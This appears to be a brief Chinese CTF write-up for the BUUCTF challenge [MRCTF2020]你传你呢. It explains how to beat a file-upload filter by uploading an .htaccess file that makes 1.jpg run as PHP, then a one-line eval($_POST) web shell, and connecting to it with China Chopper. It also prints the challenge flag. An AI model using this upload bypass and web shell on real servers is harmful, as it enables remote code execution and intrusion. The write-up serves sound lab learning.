[MRCTF2020]你传你呢 1

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

[MRCTF2020]你传你呢 1

  • 题目
  • 一、做题步骤
    • 1.上传文件
    • 2.菜刀连接


题目

BUUCTF的[MRCTF2020]你传你呢 1
[MRCTF2020]你传你呢 1_第1张图片


一、做题步骤

1.上传文件

上传.htaccess文件
.htaccess可以执行后缀名为jpg的php文件

<FilesMatch "1.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

[MRCTF2020]你传你呢 1_第2张图片

上传命名为1.jpg的php文件

<?php
eval($_POST[1]);
?>

[MRCTF2020]你传你呢 1_第3张图片
得到上传路径

2.菜刀连接

1.添加信息
[MRCTF2020]你传你呢 1_第4张图片

2.连接成功

[MRCTF2020]你传你呢 1_第5张图片
[MRCTF2020]你传你呢 1_第6张图片

3.获取flag
flag{fcbc145d-c720-4091-baa2-1444e25a42b2}

你可能感兴趣的:(web)